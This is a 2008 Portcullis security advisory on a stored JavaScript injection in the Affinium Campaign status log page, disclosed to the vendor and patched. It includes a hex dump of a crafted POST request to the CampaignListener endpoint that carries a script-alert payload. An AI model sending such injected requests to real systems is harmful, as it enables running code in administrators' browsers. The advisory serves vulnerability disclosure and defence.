Portcullis Security Advisory - 08-004


Vulnerable System:

Affinium Campaign


Vulnerability Title:

The web application's status log web page is vulnerable to a second order JavaScript injection.


Vulnerability Discovery And Development:

Portcullis Security Testing Services.


Credit For Discovery:

Tim Brown - Portcullis Computer-Security Ltd.


Affected systems:

All known versions of Affinium Campaign; the vulnerability discovered was for version 7.2.1.0.55.


Details:

It is possible for an attacker to inject JavaScript into the web application which is typically deployed in front of the listener server by manipulating requests from the web application's ActiveX control which encapsulates binary data within an HTTP POST request to https://webserver/Campaign/CampaignListener. The status log contains the requests made to the CampaignListener web page along with the results of any such requests. Since the CampaignListener web page is expecting binary data, no attempt to validate the input is made prior to passing it to the listener server. When an authenticated administrative user visits the status logs web page, the JavaScript from the manipulated ActiveX control request is returned in the response. For example:

00000000  50 4f 53 54 20 2f 43 61  6d 70 61 69 67 6e 2f 43  |POST /Campaign/C|
00000010  61 6d 70 61 69 67 6e 4c  69 73 74 65 6e 65 72 3f  |ampaignListener?|
00000020  43 6c 69 65 6e 74 49 44  3d 36 20 48 54 54 50 2f  |ClientID=6 HTTP/|
00000030  31 2e 31 0d 0a 48 6f 73  74 3a 20 77 65 62 73 65  |1.1..Host: webse|
00000040  72 76 65 72 0d 0a 43 6f  6f 6b 69 65 3a 20 43 41  |rver..Cookie: CA|
00000050  4d 50 41 49 47 4e 53 45  53 53 49 4f 4e 49 44 3d  |MPAIGNSESSIONID=|
00000060  48 57 57 43 54 4c 6d 58  59 54 64 6d 50 6e 68 50  |HWWCTLmXYTdmPnhP|
00000070  41 76 4a 59 54 78 66 54  73 76 41 6e 41 78 68 79  |AvJYTxfTsvAnAxhy|
00000080  54 5a 50 7a 6b 34 6a 43  47 38 47 52 44 51 57 6b  |TZPzk4jCG8GRDQWk|
00000090  42 36 6e 5a 21 37 30 37  36 33 30 32 33 39 0d 0a  |B6nZ!707630239..|
000000a0  43 6f 6e 74 65 6e 74 2d  4c 65 6e 67 74 68 3a 20  |Content-Length: |
000000b0  32 39 31 0d 0a 43 6f 6e  74 65 6e 74 2d 54 79 70  |291..Content-Typ|
000000c0  65 3a 20 6d 75 6c 74 69  70 61 72 74 2f 66 6f 72  |e: multipart/for|
000000d0  6d 2d 64 61 74 61 0d 0a  0d 0a 1f 01 00 00 01 00  |m-data..........|
000000e0  02 07 0c 00 00 00 01 01  00 00 00 03 00 00 00 12  |................|
000000f0  0c 00 00 00 75 6e 69 63  61 5f 61 63 73 76 72 00  |....unica_acsvr.|
00000100  12 73 00 00 00 3c 73 63  72 69 70 74 3e 61 6c 65  |.s...<script>ale|
00000110  72 74 28 27 78 73 73 27  29 3c 2f 73 63 72 69 70  |rt('xss')</scrip|
00000120  74 3e 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |t>AAAAAAAAAAAAAA|
00000130  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
*
00000170  41 41 41 41 41 41 41 00  04 2a 00 00 00 0e f2 95  |AAAAAAA..*....ò.|
00000180  47 51 57 f2 00 00 00 00  00 14 00 00 00 01 29 d5  |GQWò..........)Õ|
00000190  1b 4f 5f 75 72 f9 00 66  3c 62 8a b8 d6 c3 a6 4f  |.O_urù.f<b.¸ÖæO|
000001a0  63 00 00 00 00 00 00 12  0b 00 00 00 70 61 72 74  |c...........part|
000001b0  69 74 69 6f 6e 31 00 12  00 00 00 00 12 0e 00 00  |ition1..........|
000001c0  00 31 32 30 31 30 30 37  38 37 31 32 39 38 00 05  |.1201007871298..|
000001d0  01 00 00 00 00 00 00 00  05 01 00 00 00 00 00 00  |................|
000001e0  00 05 01 00 00 00 02 00  00 00 12 03 00 00 00 2d  |...............-|
000001f0  6c 00 12 06 00 00 00 65  6e 5f 55 53 00 0d 0a     |l......en_US...|


Impact:

An attacker would use this to execute malicious code on a visitors computers.


Exploit:

Exploit code is not required.

Vendor Status:

05/06/2008 - vendor informed
10/06/2008 - Vendor updated
11/06/2008 - Vendor responded via email
16/07/2008 - Vendor confirmed patches


Copyright:

Copyright © Portcullis Computer Security Limited 2008, All rights reserved worldwide.
Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.


Disclaimer:

The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.